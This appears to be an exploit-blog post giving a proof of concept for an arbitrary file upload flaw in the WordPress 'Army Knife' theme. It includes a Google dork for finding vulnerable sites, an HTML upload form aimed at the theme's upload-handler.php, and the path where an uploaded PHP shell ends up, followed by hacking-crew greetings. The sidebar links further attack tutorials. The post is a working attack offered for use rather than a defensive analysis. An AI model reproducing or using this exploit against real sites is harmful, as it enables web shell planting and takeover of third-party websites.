• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

WordPress Army Knife CSRF File Upload Vulnerability

November 9, 2013 by Jack Wilder Leave a Comment

Exploit Title: WordPress Army Knife CSRF File Upload Vulnerability
Author: Bebyyers404
Date: 11/09/2013
Vendor Homepage: http://freelancewp.co

Themes Link: http://freelancewp.com/wordpress-theme/army-knife/
Infected File: upload-handler.php
Category: webapps/php
Google dork: inurl:/wp-content/themes/armyknife
Tested on : Windows/Linux

Exploit & POC :

<form enctype=”multipart/form-data”
action=”http://127.0.0.1/wordpress/wp-content/themes/armyknife/functions/upload-handler.php” method=”post”>
Please choose a file: <input name=”uploadfile” type=”file” /><br />
<input type=”submit” value=”upload” />
</form>

File path:
http://127.0.0.1/wordpress/wp-content/uploads/[year]/[month]/yourshell.php

./Nabilaholic404, ./Bebyyers404, ./Panda Dot ID, ./Tsunaomi48, ./Pscript ./Mbah-Rowo

JKT48 CYBER TEAM & Black Devils Crew

Shares

Filed Under: WordPress Exploit Tagged With: Exploit

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Bruteforce FTP Login dengan Metasploit Module FTP Authentication Scanner

WordPress Army Knife CSRF File Upload Vulnerability

Heroku Custom Domain or Subdomain Takeover

Tumblr Custom Domain or Subdomain Takeover

Hack Targeted Website using Reverse IP

Cracking FTP Password using Hydra on BackBox Linux

Open Redirect Bypass Cheat Sheet

WordPress Fraction Theme Version 1.1.1 Suffers from a Privilege Escalation Vulnerability

Surge.sh Custom Domain or Subdomain Takeover

Deface WordPress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability

Powered by WordPress and Genesis Framework. Style by LinuxSec.